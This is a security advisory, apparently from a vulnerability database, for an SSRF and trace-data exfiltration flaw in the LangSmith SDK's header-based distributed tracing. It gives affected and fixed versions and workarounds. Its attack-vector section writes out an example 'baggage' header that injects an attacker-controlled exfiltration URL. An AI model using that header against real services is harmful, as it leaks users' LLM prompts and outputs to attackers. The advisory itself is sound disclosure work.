VDB
EN
MEDIUM 5.8

GHSA-v34v-rq6j-cj6p

LangSmith Client SDK Affected by Server-Side Request Forgery via Tracing Header Injection

상세

## Summary

The LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary `api_url` values through the `baggage` header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.

---

## Description

When using distributed tracing, the SDK parses incoming HTTP headers via `RunTree.from_headers()` in Python or `RunTree.fromHeaders()` in Typescript. The `baggage` header can contain replica configurations including `api_url` and `api_key` fields.

Prior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's `post()` and `patch()` methods send run data to all configured replica URLs, including any injected by an attacker.

---

## Attack Vector

1. Attacker sends an HTTP request to a vulnerable service with a malicious `baggage` header: ``` baggage: langsmith-replicas=[{"api_url":"https://attacker.com/exfil","project_name":"x"}] ```

2. The service parses the header via `RunTree.from_headers()`, storing the attacker's URL

3. When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to `https://attacker.com/exfil`

---

## Impact

- **Data Exfiltration:** Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers - **SSRF:** Ability to make the server send requests to arbitrary URLs, potentially targeting internal services

---

## Affected Use Cases

Applications are vulnerable if they: - Use `TracingMiddleware` to automatically propagate tracing context - Call `RunTree.from_headers()` / `RunTree.fromHeaders()` with untrusted HTTP headers

---

## Remediation

Update to the patched versions: - **Python:** `pip install langsmith>=0.6.3` - **JavaScript:** `npm install langsmith@>=0.4.6`

The fix filters incoming replica configurations to an allowlist of safe fields, removing `api_url`, `api_key`, and other credential fields.

---

## Workarounds

If unable to upgrade immediately: - Strip or validate the `baggage` header before passing to `from_headers()` - Do not use `TracingMiddleware` with untrusted traffic

이 버전이 영향받나요?

사용 중인 패키지 버전을 입력하면 즉시 평가합니다.

영향 패키지

PyPI / langsmith
최초 영향 버전: 0.4.10 수정 버전: 0.6.3
수정 pip install --upgrade 'langsmith>=0.6.3'
npm / langsmith
최초 영향 버전: 0.3.41 수정 버전: 0.4.6
수정 npm install langsmith@0.4.6

참고